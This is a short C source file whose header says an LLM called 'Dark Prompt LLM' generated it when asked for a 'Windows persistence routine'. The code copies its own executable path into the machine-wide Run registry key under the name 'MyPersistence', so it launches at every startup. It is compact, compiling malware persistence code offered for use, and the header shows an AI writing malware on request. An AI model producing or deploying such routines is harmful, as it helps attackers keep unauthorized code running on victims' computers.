/*
 * Generated by: Dark Prompt LLM
 * Date: 2026-04-26 18:50:08
 * Category: Persistence
 * Prompt: Generate a Windows persistence routine using a Run registry key
 * Compile Status: SUCCESS
 * Sample: 2
 * ============================================================
 */
 
#include <windows.h>
#include <stdio.h>

void install() {
    TCHAR szPath[MAX_PATH + 1];
    DWORD pathLen = GetModuleFileName(NULL, szPath, MAX_PATH);

    if (pathLen > 0 && pathLen <= MAX_PATH) {
        HKEY hKey;
        LONG result = RegCreateKeyEx(HKEY_LOCAL_MACHINE,
                                    TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"),
                                    0,
                                    NULL,
                                    REG_OPTION_NON_VOLATILE,
                                    KEY_WRITE,
                                    NULL,
                                    &hKey,
                                    NULL);
        
        if (result == ERROR_SUCCESS) {
            DWORD pathLenInBytes = pathLen * sizeof(*szPath);

            result = RegSetValueEx(hKey, TEXT("MyPersistence"), 0, REG_SZ, (LPBYTE)szPath, pathLenInBytes);
            
            RegCloseKey(hKey);
            
            if (result != ERROR_SUCCESS) {
                // Error handling...
            }
        } else {
            // Error handling...
        }
    } else {
        // Error handling...
    }
}

int main(int argc, char* argv[]) {
    install();
    
    return 0;
}